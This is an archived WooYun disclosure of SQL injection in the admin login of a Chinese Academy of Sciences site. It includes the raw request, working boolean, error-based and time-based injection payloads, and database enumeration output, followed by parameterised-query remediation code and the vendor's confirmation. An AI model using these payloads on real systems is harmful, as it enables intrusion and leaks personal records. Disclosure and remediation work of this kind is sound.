
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0146883

Title: Login-form injection in the backend management system of a Chinese Academy of Sciences site leaks user information

Vendor: Chinese Academy of Sciences

Author: 偶然

Submitted: 2015-10-15 11:18

Fixed: 2015-12-03 18:18

Published: 2015-12-03 18:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-15: Details sent to the vendor, awaiting vendor response
2015-10-19: Vendor confirmed; details visible to the vendor only
2015-10-29: Details disclosed to core white hats and domain experts
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to intern white hats
2015-12-03: Details disclosed to the public

Brief description:

I hear the vendor is a good one.

Detailed description:

POST /admin/logadmin.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/admin/login.php
Cookie: PHPSESSID=bjgoj8dp2q76m7n7hnhcq17616
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
username=admin&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
The username parameter is injectable.

Proof of vulnerability:

Place: POST
Parameter: username
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: username=admin' RLIKE IF(5126=5126,0x61646d696e,0x28) AND 'tyOj'='tyOj&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=admin' AND (SELECT 8851 FROM(SELECT COUNT(*),CONCAT(0x3a6f73763a,(SELECT (CASE WHEN (8851=8851) THEN 1 ELSE 0 END)),0x3a69746b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xitt'='xitt&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: username=-3463' OR 8168=SLEEP(5) AND 'Zmqa'='Zmqa&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
---
web server operating system: Linux Debian
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] orsc_web
Database: orsc_web
[6 tables]
+---------+
| admin |
| conlist |
| const |
| content |
| member |
| message |
+---------+
web server operating system: Linux Debian
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0
Database: orsc_web
+--------+---------+
| Table | Entries |
+--------+---------+
| member | 1184 |
+--------+---------+
Pulled two random users to take a look.
Table: member
[2 entries]
| mem_id | mem_ri | mem_yue | mem_shi | mem_pic | mem_time | mem_name | mem_type | mem_nian | mem_zhuye | mem_email | mem_sheng | mem_dizhi | mem_minzu | mem_number | mem_wenhua | mem_jianli | mem_shouji | mem_danwei | mem_status | mem_dangpai | mem_dianhua | mem_xingbie | mem_youbian | mem_nicheng | mem_password | mem_zhicheng | mem_daoqishijian | mem_shenfenzheng | mem_zhichengdengji | mem_renzhiqingkuang |
Admin panel:



Remediation:

1. Do not expose the admin panel.
2. Parameterise SQL queries and filter keywords.

Copyright notice: please credit 偶然@乌云 when reposting.
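The second remediation item in PHP terms, as an added example that is not code from the report or from the affected site: the string-splicing login query that makes a username such as the one in the proof injectable, beside the prepared-statement version. The report names the `admin` table in `orsc_web` but not its columns, so the column names, the connection details and the hashed-password storage are assumptions.

```php
<?php
// Added example: vulnerable login query beside its parameterised replacement.
// Column names (username, password, password_hash) and the connection
// credentials are assumed; the report only names the admin table in orsc_web.
declare(strict_types=1);

$pdo = new PDO(
    'mysql:host=127.0.0.1;dbname=orsc_web;charset=utf8mb4',
    'webuser',              // assumed low-privilege DB account for the web app
    'CHANGE_ME',            // placeholder, not a real credential
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepares
    ]
);

// Vulnerable pattern: the submitted username and password become part of the
// SQL text itself, so a quote in the input ends the string literal and the rest
// of the input is executed as SQL (boolean, error-based and time-based blind
// injection all follow from this one mistake).
function login_vulnerable(PDO $pdo, string $username, string $password): bool
{
    $sql = "SELECT id FROM admin WHERE username = '$username' AND password = '$password'";
    return $pdo->query($sql)->fetch() !== false;
}

// Hardened pattern: the query text is fixed at prepare time and the username
// travels as a bound parameter, so it can only ever be compared as data.
// The password is checked against a salted hash in PHP, not compared in SQL,
// which also removes the plaintext-password column the dump exposed.
function login_safe(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare(
        'SELECT password_hash FROM admin WHERE username = :u LIMIT 1'
    );
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // password_verify() is constant-time; an unknown user fails the same way
    // as a wrong password, so the response does not reveal which one it was.
    return $row !== false && password_verify($password, $row['password_hash']);
}

// Usage with the submitted form fields; the CAPTCHA field (validator) should be
// checked before this call, and the whole endpoint kept off the public internet.
$ok = login_safe($pdo, (string) ($_POST['username'] ?? ''), (string) ($_POST['password'] ?? ''));
```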


Vulnerability response

Vendor response:

Severity: Medium

Rank: 9

Confirmed: 2015-10-19 18:16

Vendor reply:

CNVD confirmed and reproduced the reported vulnerability; it has been forwarded via CNCERT to the Chinese Academy of Sciences, which will coordinate handling with the unit that operates the site.

Latest status:

None